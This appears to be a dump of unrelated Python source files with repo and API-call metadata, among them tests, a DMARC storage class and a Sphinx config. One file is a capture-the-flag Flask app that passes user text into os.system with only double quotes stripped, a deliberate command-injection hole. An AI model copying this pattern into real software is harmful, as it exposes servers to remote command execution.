self.backup_engine_name = kwargs.get('backup_engine_name', None)
self.fabric_name = kwargs.get('fabric_name', None)
self.status = kwargs.get('status', None)
self.friendly_name = kwargs.get('friendly_name', None)
| [] |
rdenadai/ia870p3 | ia870/iagradm.py | c4823efc4b8e5f187a64f8a4e9962e328bf86967 | # -*- encoding: utf-8 -*-
# Module iagradm
def iagradm(f, Bdil=None, Bero=None):
from ia870 import iasubm,iadil,iaero,iasecross
if Bdil is None: Bdil = iasecross()
if Bero is None: Bero = iasecross()
    # Morphological gradient: dilation minus erosion
    y = iasubm( iadil(f,Bdil),iaero(f,Bero))
return y
| [((7, 28, 7, 39), 'ia870.iasecross', 'iasecross', ({}, {}), '()', False, 'from ia870 import iasubm, iadil, iaero, iasecross\n'), ((8, 28, 8, 39), 'ia870.iasecross', 'iasecross', ({}, {}), '()', False, 'from ia870 import iasubm, iadil, iaero, iasecross\n'), ((10, 16, 10, 29), 'ia870.iadil', 'iadil', ({(10, 22, 10, 23): 'f', (10, 24, 10, 28): 'Bdil'}, {}), '(f, Bdil)', False, 'from ia870 import iasubm, iadil, iaero, iasecross\n'), ((10, 30, 10, 43), 'ia870.iaero', 'iaero', ({(10, 36, 10, 37): 'f', (10, 38, 10, 42): 'Bero'}, {}), '(f, Bero)', False, 'from ia870 import iasubm, iadil, iaero, iasecross\n')] |
ChristchurchCityWeightlifting/lifter-api | backend/api/tests/test_models/test_utils/test_ranking_suffixes.py | a82b79c75106e7f4f8ea4b4e3e12d727213445e3 | import pytest
from api.models.utils import rankings
@pytest.fixture
def test_data():
return [1, 11, 101]
def test_rankings(test_data):
"""Tests if ranking works
e.g. 1 returns 1st
11 returns 11th
101 return 101st
"""
assert rankings(test_data[0]) == "1st"
assert rankings(test_data[1]) == "11th"
assert rankings(test_data[2]) == "101st"
| [((17, 11, 17, 33), 'api.models.utils.rankings', 'rankings', ({(17, 20, 17, 32): 'test_data[0]'}, {}), '(test_data[0])', False, 'from api.models.utils import rankings\n'), ((18, 11, 18, 33), 'api.models.utils.rankings', 'rankings', ({(18, 20, 18, 32): 'test_data[1]'}, {}), '(test_data[1])', False, 'from api.models.utils import rankings\n'), ((19, 11, 19, 33), 'api.models.utils.rankings', 'rankings', ({(19, 20, 19, 32): 'test_data[2]'}, {}), '(test_data[2])', False, 'from api.models.utils import rankings\n')] |
NoXLaw/RaRCTF2021-Challenges-Public | web/web-lemonthinker/src/app/app.py | 1a1b094359b88f8ebbc83a6b26d27ffb2602458f | from flask import Flask, request, redirect, url_for
import os
import random
import string
import time # lemonthink
clean = time.time()
app = Flask(__name__)
chars = list(string.ascii_letters + string.digits)
@app.route('/')
def main():
return open("index.html").read()
@app.route('/generate', methods=['POST'])
def upload():
global clean
    # Remove previously generated images at most once per minute
    if time.time() - clean > 60:
os.system("rm static/images/*")
clean = time.time()
text = request.form.getlist('text')[0]
text = text.replace("\"", "")
filename = "".join(random.choices(chars,k=8)) + ".png"
os.system(f"python3 generate.py {filename} \"{text}\"")
return redirect(url_for('static', filename='images/' + filename), code=301) | [((7, 8, 7, 19), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((8, 6, 8, 21), 'flask.Flask', 'Flask', ({(8, 12, 8, 20): '__name__'}, {}), '(__name__)', False, 'from flask import Flask, request, redirect, url_for\n'), ((24, 4, 24, 59), 'os.system', 'os.system', ({(24, 14, 24, 58): 'f"""python3 generate.py {filename} "{text}\\""""'}, {}), '(f\'python3 generate.py {filename} "{text}"\')', False, 'import os\n'), ((19, 6, 19, 37), 'os.system', 'os.system', ({(19, 16, 19, 36): '"""rm static/images/*"""'}, {}), "('rm static/images/*')", False, 'import os\n'), ((20, 14, 20, 25), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((21, 11, 21, 39), 'flask.request.form.getlist', 'request.form.getlist', ({(21, 32, 21, 38): '"""text"""'}, {}), "('text')", False, 'from flask import Flask, request, redirect, url_for\n'), ((25, 20, 25, 68), 'flask.url_for', 'url_for', (), '', False, 'from flask import Flask, request, redirect, url_for\n'), ((18, 7, 18, 18), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((23, 23, 23, 48), 'random.choices', 'random.choices', (), '', False, 'import random\n')] |
renatodev95/Python | aprendizado/codewars/descending_order.py | 2adee4a01de41f8bbb68fce563100c135a5ab549 | # Your task is to make a function that can take any non-negative integer as an argument and return it with its digits in descending order. Essentially, rearrange the digits to create the highest possible number.
# Function that takes a non-negative integer as an argument and returns it with its digits in descending order. Essentially, arrange the digits to create the highest possible number.
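# For example, descending_order(42145) should return 54421.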
# First version
def descending_order(num):
new_num = str(num)
new_num1 = [int(x) for x in new_num]
new_num1 = sorted(new_num1, reverse=True)
string = ''
for x in new_num1:
string += str(x)
return int(string)
# Refactoring of the first version (using a list comprehension)
def descending_order_two(num):
return int(''.join([x for x in sorted(str(num), reverse=True)]))
#
#
| [] |
Schramp/dmarc-monitoring | dmarc_storage.py | 619a162f71a788e81d92ca281ec0bdcf13c2e8e8 | import sqlite3
import os
import datetime
__all__ = ['DMARCStorage', 'totimestamp']
def totimestamp(datetime_object):
if datetime_object.utcoffset() is not None:
utc_naive = datetime_object.replace(tzinfo=None) - datetime_object.utcoffset()
else:
utc_naive = datetime_object
return (utc_naive - datetime.datetime(1970, 1, 1)).total_seconds()
class DMARCStorage(object):
def __init__(self, database_filename='dmarc.sqlite', database_directory="./results"):
# Create or connect to the database:
database_path = os.path.join(database_directory, database_filename)
if not os.path.exists(database_directory):
os.makedirs(database_directory)
self._conn = sqlite3.connect(database_path)
# Set automcommit to true and initialise cursor:
self._conn.isolation_level = None
self._cur = self._conn.cursor()
# Create the tables if they don't exist already:
self._init_database()
def __del__(self):
if self._conn is not None:
self._close_connection()
def _init_database(self):
self._cur.execute("PRAGMA foreign_keys = ON;")
self._cur.execute("""CREATE TABLE IF NOT EXISTS dmarc_reports (
report_id TEXT PRIMARY KEY,
receiver TEXT,
report_filename TEXT,
report_start INTEGER,
report_end INTEGER
);""")
self._cur.execute("""CREATE TABLE IF NOT EXISTS dmarc_records (
report_id TEXT REFERENCES dmarc_reports(report_id) ON DELETE CASCADE,
record_id INTEGER,
ip_address TEXT,
hostname TEXT,
disposition TEXT,
reason TEXT,
spf_pass INTEGER,
dkim_pass INTEGER,
header_from TEXT,
envelope_from TEXT,
count INTEGER,
PRIMARY KEY (report_id, record_id)
);""")
self._cur.execute("""CREATE TABLE IF NOT EXISTS spf_results (
report_id TEXT,
record_id INTEGER,
spf_id INTEGER,
domain TEXT,
result TEXT,
PRIMARY KEY (report_id, record_id, spf_id),
FOREIGN KEY (report_id, record_id)
REFERENCES dmarc_records(report_id, record_id)
ON DELETE CASCADE
);""")
self._cur.execute("""CREATE TABLE IF NOT EXISTS dkim_signatures (
report_id TEXT,
record_id INTEGER,
signature_id INTEGER,
domain TEXT,
result TEXT,
selector TEXT,
PRIMARY KEY (report_id, record_id, signature_id),
FOREIGN KEY (report_id, record_id)
REFERENCES dmarc_records(report_id, record_id)
ON DELETE CASCADE,
CONSTRAINT unique_dkim_sig
UNIQUE (report_id, record_id, domain, result, selector)
);""")
def _delete_all_data(self):
# Drop the tables in the right order:
self._cur.execute("DROP TABLE dkim_signatures;")
self._cur.execute("DROP TABLE spf_results;")
self._cur.execute("DROP TABLE dmarc_records;")
self._cur.execute("DROP TABLE dmarc_reports;")
# Recreate them again, empty:
self._init_database()
def _close_connection(self):
self._conn.close()
self._conn = None
def report_already_exists(self, report_filename):
# Check if a report with that filename already exists:
self._cur.execute("SELECT report_filename FROM dmarc_reports WHERE report_filename=?;", (report_filename,))
already_exists = self._cur.fetchone() is not None
return already_exists
def save_new_report(self, report):
# Persist the report itself:
self._cur.execute("INSERT INTO dmarc_reports VALUES (?,?,?,?,?);",
[report.id, report.receiver, report.filename,
totimestamp(report.start_date), totimestamp(report.end_date)])
# Persist each record of that report with a generated ID:
for rec_id, rec in enumerate(report.records):
self._cur.execute("INSERT INTO dmarc_records VALUES (?,?,?,?,?,?,?,?,?,?,?);",
[report.id, rec_id, rec.ip, rec.host, rec.disposition, rec.reason,
rec.spf_pass, rec.dkim_pass, rec.header_from, rec.envelope_from,
rec.count])
# Persist the SPF data:
for spf_id, spf_result in enumerate(rec.spf_results):
self._cur.execute("INSERT INTO spf_results VALUES (?,?,?,?,?);",
[report.id, rec_id, spf_id, spf_result["domain"], spf_result["result"]])
# Persist all the DKIM signatures with generated IDs
for sig_id, sig in enumerate(rec.dkim_signatures):
self._cur.execute("INSERT INTO dkim_signatures VALUES (?,?,?,?,?,?);",
[report.id, rec_id, sig_id, sig["domain"], sig["result"], sig["selector"]])
def get_reporting_start_date(self):
self._cur.execute("SELECT min(report_start) FROM dmarc_reports;")
return datetime.datetime.utcfromtimestamp(self._cur.fetchone()[0])
def get_reporting_end_date(self):
self._cur.execute("SELECT max(report_start) FROM dmarc_reports;")
return datetime.datetime.utcfromtimestamp(self._cur.fetchone()[0])
def get_number_reports(self):
self._cur.execute("SELECT count(*) FROM dmarc_reports;")
return self._cur.fetchone()[0]
def get_count_by_disposition(self):
self._cur.execute("SELECT disposition, sum(count) FROM dmarc_records GROUP BY disposition;")
return {str(r[0]): r[1] for r in self._cur.fetchall()}
def get_count_by_hostnames(self):
self._cur.execute("SELECT hostname, ip_address, sum(count) FROM dmarc_records GROUP BY hostname, ip_address;")
return {str(r[0]) if r[0] is not None else str(r[1]): r[2] for r in self._cur.fetchall()}
def get_count_by_receiver(self):
self._cur.execute("SELECT receiver, sum(count) FROM dmarc_reports JOIN dmarc_records " +
"ON dmarc_reports.report_id=dmarc_records.report_id GROUP BY receiver;")
return {str(r[0]): r[1] for r in self._cur.fetchall()}
def get_count_by_dkim_domain(self):
self._cur.execute("SELECT domain, sum(count) FROM dmarc_records JOIN dkim_signatures " +
"ON dmarc_records.report_id=dkim_signatures.report_id AND " +
"dmarc_records.record_id=dkim_signatures.record_id GROUP BY domain;")
return {str(r[0]): r[1] for r in self._cur.fetchall()}
def get_count_by_status_string(self):
self._cur.execute("SELECT spf_pass, dkim_pass, sum(count) FROM dmarc_records GROUP BY spf_pass, dkim_pass;")
status = {1: "pass", 0: "fail", None: "n/a"}
return {"SPF:%s, DKIM:%s" % (status[r[0]], status[r[1]]): r[2] for r in self._cur.fetchall()}
def get_raw_spf_status_count_by_timestamp(self):
self._cur.execute("SELECT report_start, spf_pass, count FROM dmarc_reports JOIN dmarc_records " +
"ON dmarc_reports.report_id=dmarc_records.report_id;")
return self._cur.fetchall()
def get_raw_dkim_status_count_by_timestamp(self):
self._cur.execute("SELECT report_start, dkim_pass, count FROM dmarc_reports JOIN dmarc_records " +
"ON dmarc_reports.report_id=dmarc_records.report_id;")
return self._cur.fetchall()
def get_raw_dmarc_status_count_by_timestamp(self):
self._cur.execute("SELECT report_start, spf_pass + dkim_pass, count " +
"FROM dmarc_reports JOIN dmarc_records " +
"ON dmarc_reports.report_id=dmarc_records.report_id;")
return self._cur.fetchall()
def execute_query(self, sql, values=None):
if values is not None:
self._cur.execute(sql, values)
else:
self._cur.execute(sql)
return self._cur.fetchall()
| [((20, 24, 20, 75), 'os.path.join', 'os.path.join', ({(20, 37, 20, 55): 'database_directory', (20, 57, 20, 74): 'database_filename'}, {}), '(database_directory, database_filename)', False, 'import os\n'), ((23, 21, 23, 51), 'sqlite3.connect', 'sqlite3.connect', ({(23, 37, 23, 50): 'database_path'}, {}), '(database_path)', False, 'import sqlite3\n'), ((21, 15, 21, 49), 'os.path.exists', 'os.path.exists', ({(21, 30, 21, 48): 'database_directory'}, {}), '(database_directory)', False, 'import os\n'), ((22, 12, 22, 43), 'os.makedirs', 'os.makedirs', ({(22, 24, 22, 42): 'database_directory'}, {}), '(database_directory)', False, 'import os\n'), ((13, 24, 13, 53), 'datetime.datetime', 'datetime.datetime', ({(13, 42, 13, 46): '(1970)', (13, 48, 13, 49): '(1)', (13, 51, 13, 52): '(1)'}, {}), '(1970, 1, 1)', False, 'import datetime\n')] |
mcdruid/sumologic-python-sdk | setup.py | cb1d649d0166976fb104866e9174a41bd558b817 | from setuptools import setup, find_packages
setup(
name="sumologic-sdk",
version="0.1.9",
packages=find_packages(),
install_requires=['requests>=2.2.1'],
# PyPI metadata
author="Yoway Buorn, Melchi Salins",
author_email="[email protected], [email protected]",
description="Sumo Logic Python SDK",
license="PSF",
keywords="sumologic python sdk rest api log management analytics logreduce splunk security siem collector forwarder",
url="https://github.com/SumoLogic/sumologic-python-sdk",
zip_safe=True
)
| [((6, 13, 6, 28), 'setuptools.find_packages', 'find_packages', ({}, {}), '()', False, 'from setuptools import setup, find_packages\n')] |
urm8/django-translations | docs/conf.py | e8f66710af9433044937b75c061e1988add398a5 | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
import json
import datetime
# `Django setup` below, will add the path to `translations` module
# automatically because it's been included in `project.settings`, so no need
# to import it here
# -- Django setup ------------------------------------------------------------
# generated project settings
import django
sys.path.insert(
0,
os.path.join(os.path.dirname(os.path.abspath('.')), 'project')
)
os.environ['DJANGO_SETTINGS_MODULE'] = 'project.settings'
django.setup()
# -- Project information -----------------------------------------------------
with open(
os.path.join(
os.path.dirname(os.path.abspath('.')),
'config.json'
), 'r') as fh:
info = json.load(fh)
# project
project = info['project']['name']
# description
description = info['project']['desc']
# author
author = info['author']['name']
# The short X.Y version
version = info['release']['version']
# The full version, including alpha/beta/rc tags
release = info['release']['name']
# github
github_user = info['github']['user']
github_repo = info['github']['repo']
# donation
donate_url = info['urls']['funding']
# logo
logo = info['project']['logo']
# documentation
documentation = '{} {}'.format(project, 'Documentation')
# year
year = datetime.datetime.now().year
# copyright
copyright = '{year}, {author}'.format(year=year, author=author)
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.viewcode',
'sphinx.ext.githubpages',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path .
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'monokai'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
'note_bg': '#fec',
'note_border': '#ffe2a8',
'show_relbars': True,
'logo': logo,
'touch_icon': logo,
'logo_name': True,
'description': description,
'github_user': github_user,
'github_repo': github_repo,
'github_banner': True,
}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'DjangoTranslationsdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'DjangoTranslations.tex', documentation,
author, 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'djangotranslations', documentation,
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'DjangoTranslations', documentation,
author, 'DjangoTranslations', description,
'Miscellaneous'),
]
# -- Extension configuration -------------------------------------------------
# -- Options for intersphinx extension ---------------------------------------
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
'python': ('https://docs.python.org/', None),
'django': ('http://django.readthedocs.org/en/latest/', None),
}
# -- Options for doctest extension -------------------------------------------
doctest_global_setup = """
import builtins
from django.db import connection
from django.test import TestCase
from sample.utils import create_samples
import beautifier
# Turn on the test database for the doctests
connection.creation.create_test_db(verbosity=0)
TestCase.setUpClass()
# Beautify `testoutput`
def print(value='', end='\\n'):
builtins.print(beautifier.beautify(value, False), end=end)
# Sample creation
def create_doc_samples(translations=True):
if translations:
create_samples(
continent_names=['europe', 'asia'],
country_names=['germany', 'south korea'],
city_names=['cologne', 'seoul'],
continent_fields=['name', 'denonym'],
country_fields=['name', 'denonym'],
city_fields=['name', 'denonym'],
langs=['de']
)
else:
create_samples(
continent_names=['europe', 'asia'],
country_names=['germany', 'south korea'],
city_names=['cologne', 'seoul'],
)
"""
doctest_global_cleanup = """
import builtins
from django.db import connection
from django.test import TestCase
# Normalize `testoutput`
def print(value='', end='\\n'):
builtins.print(value, end=end)
# Turn off the test database for the doctests
TestCase.tearDownClass()
connection.creation.destroy_test_db(verbosity=0)
"""
| [((34, 0, 34, 14), 'django.setup', 'django.setup', ({}, {}), '()', False, 'import django\n'), ((43, 11, 43, 24), 'json.load', 'json.load', ({(43, 21, 43, 23): 'fh'}, {}), '(fh)', False, 'import json\n'), ((75, 7, 75, 30), 'datetime.datetime.now', 'datetime.datetime.now', ({}, {}), '()', False, 'import datetime\n'), ((31, 33, 31, 53), 'os.path.abspath', 'os.path.abspath', ({(31, 49, 31, 52): '"""."""'}, {}), "('.')", False, 'import os\n'), ((40, 28, 40, 48), 'os.path.abspath', 'os.path.abspath', ({(40, 44, 40, 47): '"""."""'}, {}), "('.')", False, 'import os\n')] |
orchardbirds/skorecard-1 | skorecard/metrics/__init__.py | 0f5375a6c159bb35f4b62c5be75a742bf50885e2 | """Import required Metric."""
from .metrics import IV_scorer
__all__ = ["IV_scorer"]
| [] |
geant-multicloud/MCMS-mastermind | src/waldur_core/core/tests/helpers.py | 81333180f5e56a0bc88d7dad448505448e01f24e | import copy
from django.conf import settings
from django.test.utils import override_settings
from rest_framework import status, test
class PermissionsTest(test.APITransactionTestCase):
"""
Abstract class for permissions tests.
Methods `get_urls_configs`, `get_users_with_permission`,
`get_users_without_permissions` have to be overridden.
Logical example:
class ExamplePermissionsTest(PermissionsTest):
def get_users_with_permission(self, url, method):
if is_unreachable(url):
# no one has access to an unreachable url
return []
return [user_with_permission]
def get_users_without_permissions(self, url, method):
if is_unreachable(url):
# nobody can access an unreachable url, so every user lacks permission
return [user_with_permission, user_without_permission]
return [user_without_permission]
def get_urls_configs(self):
yield {'url': 'http://testserver/some/url', 'method': 'GET'}
yield {'url': 'http://testserver/some/unreachable/url', 'method': 'POST'}
...
"""
def get_urls_configs(self):
"""
Return a list or generator of url configs.
Each url config is a dictionary with the following keys:
- url: url itself
- method: request method
- data: data which will be sent in request
url config example:
{
'url': 'http://testserver/api/backup/',
'method': 'POST',
'data': {'backup_source': 'backup/source/url'}
}
"""
raise NotImplementedError()
def get_users_with_permission(self, url, method):
"""
Return a list of users who can access the given url with the given method
"""
raise NotImplementedError()
def get_users_without_permissions(self, url, method):
"""
Return a list of users who cannot access the given url with the given method
"""
raise NotImplementedError()
def test_permissions(self):
"""
Go through all url configs and check that users with permissions
can request them and users without permissions cannot
"""
for conf in self.get_urls_configs():
url, method = conf['url'], conf['method']
data = conf['data'] if 'data' in conf else {}
for user in self.get_users_with_permission(url, method):
self.client.force_authenticate(user=user)
response = getattr(self.client, method.lower())(url, data=data)
self.assertFalse(
response.status_code
in (status.HTTP_403_FORBIDDEN, status.HTTP_404_NOT_FOUND),
'Error. User %s can not reach url: %s (method:%s). (Response status code %s, data %s)'
% (user, url, method, response.status_code, response.data),
)
for user in self.get_users_without_permissions(url, method):
self.client.force_authenticate(user=user)
response = getattr(self.client, method.lower())(url, data=data)
unreachable_statuses = (
status.HTTP_403_FORBIDDEN,
status.HTTP_404_NOT_FOUND,
status.HTTP_409_CONFLICT,
)
self.assertTrue(
response.status_code in unreachable_statuses,
'Error. User %s can reach url: %s (method:%s). (Response status code %s, data %s)'
% (user, url, method, response.status_code, response.data),
)
class ListPermissionsTest(test.APITransactionTestCase):
"""
Abstract class that tests which objects a user receives in a list response.
Method `get_users_and_expected_results` has to be overridden.
Method `get_url` has to be defined.
"""
def get_url(self):
return None
def get_users_and_expected_results(self):
"""
Return a list or generator of dictionaries with the following keys:
- user - the user we want to test
- expected_results - list of dictionaries with the fields the user
has to receive in the server response
"""
pass
def test_list_permissions(self):
for user_and_expected_result in self.get_users_and_expected_results():
user = user_and_expected_result['user']
expected_results = user_and_expected_result['expected_results']
self.client.force_authenticate(user=user)
response = self.client.get(self.get_url())
self.assertEqual(
len(expected_results),
len(response.data),
'User %s received the wrong number of objects. Expected: %s, received %s'
% (user, len(expected_results), len(response.data)),
)
for actual, expected in zip(response.data, expected_results):
for key, value in expected.items():
self.assertEqual(actual[key], value)
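# A minimal sketch of a concrete subclass, assuming a hypothetical "projects"
# list endpoint and hypothetical user fixtures created elsewhere in setUp; it
# only illustrates the shapes the two overrides are expected to return.
#
# class ProjectListPermissionsTest(ListPermissionsTest):
#     def get_url(self):
#         return 'http://testserver/api/projects/'
#
#     def get_users_and_expected_results(self):
#         return [
#             {'user': self.staff, 'expected_results': [{'name': 'Project A'}, {'name': 'Project B'}]},
#             {'user': self.user, 'expected_results': [{'name': 'Project A'}]},
#         ]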
def override_waldur_core_settings(**kwargs):
waldur_settings = copy.deepcopy(settings.WALDUR_CORE)
waldur_settings.update(kwargs)
return override_settings(WALDUR_CORE=waldur_settings)
| [((139, 22, 139, 57), 'copy.deepcopy', 'copy.deepcopy', ({(139, 36, 139, 56): 'settings.WALDUR_CORE'}, {}), '(settings.WALDUR_CORE)', False, 'import copy\n'), ((141, 11, 141, 57), 'django.test.utils.override_settings', 'override_settings', (), '', False, 'from django.test.utils import override_settings\n')] |
Gummary/denet | data/benchmark.py | 00d814d75eea54d5b259fce128ae7b625a900140 | """
CutBlur
Copyright 2020-present NAVER corp.
MIT license
"""
import os
import glob
import data
class BenchmarkSR(data.BaseDataset):
def __init__(self, phase, opt):
root = opt.dataset_root
self.scale = opt.scale
dir_HQ, dir_LQ = self.get_subdir()
self.HQ_paths = sorted(glob.glob(os.path.join(root, dir_HQ, "*.png")))
self.LQ_paths = sorted(glob.glob(os.path.join(root, dir_LQ, "*.png")))
super().__init__(phase, opt)
def get_subdir(self):
dir_HQ = "HR"
dir_LQ = "X{}".format(self.scale)
return dir_HQ, dir_LQ
class BenchmarkDN(BenchmarkSR):
def __init__(self, phase, opt):
self.sigma = opt.sigma
super().__init__(phase, opt)
def get_subdir(self):
dir_HQ = "HQ"
dir_LQ = "{}".format(self.sigma)
return dir_HQ, dir_LQ
class BenchmarkJPEG(BenchmarkSR):
def __init__(self, phase, opt):
self.quality = opt.quality
super().__init__(phase, opt)
def get_subdir(self):
dir_HQ = "HQ"
dir_LQ = "{}".format(self.quality)
return dir_HQ, dir_LQ
| [((16, 41, 16, 76), 'os.path.join', 'os.path.join', ({(16, 54, 16, 58): 'root', (16, 60, 16, 66): 'dir_HQ', (16, 68, 16, 75): '"""*.png"""'}, {}), "(root, dir_HQ, '*.png')", False, 'import os\n'), ((17, 41, 17, 76), 'os.path.join', 'os.path.join', ({(17, 54, 17, 58): 'root', (17, 60, 17, 66): 'dir_LQ', (17, 68, 17, 75): '"""*.png"""'}, {}), "(root, dir_LQ, '*.png')", False, 'import os\n')] |
iTeam-co/pytglib | pytglib/api/types/update_chat_is_pinned.py | e5e75e0a85f89b77762209b32a61b0a883c0ae61 |
from ..utils import Object
class UpdateChatIsPinned(Object):
"""
A chat was pinned or unpinned
Attributes:
ID (:obj:`str`): ``UpdateChatIsPinned``
Args:
chat_id (:obj:`int`):
Chat identifier
is_pinned (:obj:`bool`):
New value of is_pinned
order (:obj:`int`):
New value of the chat order
Returns:
Update
Raises:
:class:`telegram.Error`
"""
ID = "updateChatIsPinned"
def __init__(self, chat_id, is_pinned, order, **kwargs):
self.chat_id = chat_id # int
self.is_pinned = is_pinned # bool
self.order = order # int
@staticmethod
def read(q: dict, *args) -> "UpdateChatIsPinned":
chat_id = q.get('chat_id')
is_pinned = q.get('is_pinned')
order = q.get('order')
return UpdateChatIsPinned(chat_id, is_pinned, order)
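# A minimal usage sketch, assuming a raw update dictionary in the shape the
# library deserializes; the chat_id and order values here are hypothetical.
#
# raw = {'@type': 'updateChatIsPinned', 'chat_id': 123456789, 'is_pinned': True, 'order': 0}
# update = UpdateChatIsPinned.read(raw)
# assert update.chat_id == 123456789 and update.is_pinned is True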
| [] |
jairhenrique/todoist-python | tests/test_api.py | 755b9bd8a4fdf4e96b2381613ac0c4bed99731e5 | import io
import time
import todoist
def test_stats_get(api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
response = api.completed.get_stats()
assert 'days_items' in response
assert 'week_items' in response
assert 'karma_trend' in response
assert 'karma_last_update' in response
def test_user_update(api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
date_format = api.state['user']['date_format']
date_format_new = 1 - date_format
api.user.update(date_format=date_format_new)
api.commit()
assert date_format_new == api.state['user']['date_format']
api.user.update_goals(vacation_mode=1)
api.commit()
api.user.update_goals(vacation_mode=0)
api.commit()
def test_user_settings_update(api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
reminder_email = api.state['user_settings']['reminder_email']
if reminder_email:
reminder_email = False
else:
reminder_email = True
api.user_settings.update(reminder_email=reminder_email)
api.commit()
assert reminder_email == api.state['user_settings']['reminder_email']
def test_project_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
response = api.commit()
assert response['projects'][0]['name'] == 'Project1'
assert 'Project1' in [p['name'] for p in api.state['projects']]
assert api.projects.get_by_id(project1['id']) == project1
project1.delete()
api.commit()
def test_project_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
project1.delete()
response = api.commit()
assert response['projects'][0]['id'] == project1['id']
assert response['projects'][0]['is_deleted'] == 1
assert 'Project1' not in [p['name'] for p in api.state['projects']]
def test_project_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
project1.update(name='UpdatedProject1')
response = api.commit()
assert response['projects'][0]['name'] == 'UpdatedProject1'
assert 'UpdatedProject1' in [p['name'] for p in api.state['projects']]
assert api.projects.get_by_id(project1['id']) == project1
project1.delete()
api.commit()
def test_project_archive(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
project1.archive()
response = api.commit()
assert response['projects'][0]['name'] == 'Project1'
assert response['projects'][0]['is_archived'] == 1
assert 'Project1' in [p['name'] for p in api.state['projects']]
assert 1 in [
p['is_archived'] for p in api.state['projects']
if p['id'] == project1['id']
]
project1.delete()
api.commit()
def test_project_unarchive(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
project1.archive()
api.commit()
project1.unarchive()
response = api.commit()
assert response['projects'][0]['name'] == 'Project1'
assert response['projects'][0]['is_archived'] == 0
assert 0 in [
p['is_archived'] for p in api.state['projects']
if p['id'] == project1['id']
]
project1.delete()
api.commit()
def test_project_move_to_parent(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
project2 = api.projects.add('Project2')
api.commit()
project2.move(project1['id'])
response = api.commit()
assert response['projects'][0]['name'] == 'Project2'
assert response['projects'][0]['parent_id'] == project1['id']
assert project1['id'] in [
i['parent_id'] for i in api.state['projects'] if i['id'] == project2['id']
]
project2.delete()
api.commit()
project1.delete()
api.commit()
def test_project_reorder(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
project2 = api.projects.add('Project2')
api.commit()
api.projects.reorder(projects=[
{'id': project1['id'], 'child_order': 2},
{'id': project2['id'], 'child_order': 1},
])
response = api.commit()
for project in response['projects']:
if project['id'] == project1['id']:
assert project['child_order'] == 2
if project['id'] == project2['id']:
assert project['child_order'] == 1
